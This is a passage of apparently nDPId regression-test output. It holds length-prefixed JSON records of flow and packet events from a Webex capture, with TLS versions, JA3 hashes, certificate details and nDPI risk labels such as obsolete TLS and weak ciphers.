{"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWFAABAGRHG5P5MKCoXOLwG71XvsAB+9Nk1+uVAR\/\/\/y2QAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631058,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570631058,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAA0G+BAAEAG6O4Khc4vaxTyLOg3Abv3v7ExKrw8QIARAiEILgAAAQEICgBMwOxXHSRB"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAAoAWRAABAGM3drFPIsCoXOLwG76DcqvDxA97+xMlAQ\/\/9\/\/QAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631059,"pkt":"ABoRAAACABoRAAABCABFAAAoAWVAABAGM3ZrFPIsCoXOLwG76DcqvDxA97+xMlAR\/\/9\/\/AAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631722,"flow_last_seen":1444570631722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570631722,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1444570636154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAotbZAAEAGMx8KCAABch3V1KL+AbsYGndd5+WIpFAQOQiAFgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1444570636163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636163,"pkt":"ABoRAAACABoRAAABCABFAAAoAZFAABAGrtHRxd6fCggAAQG7uYqEY+15e5wSh1AS\/\/86HgAA"} 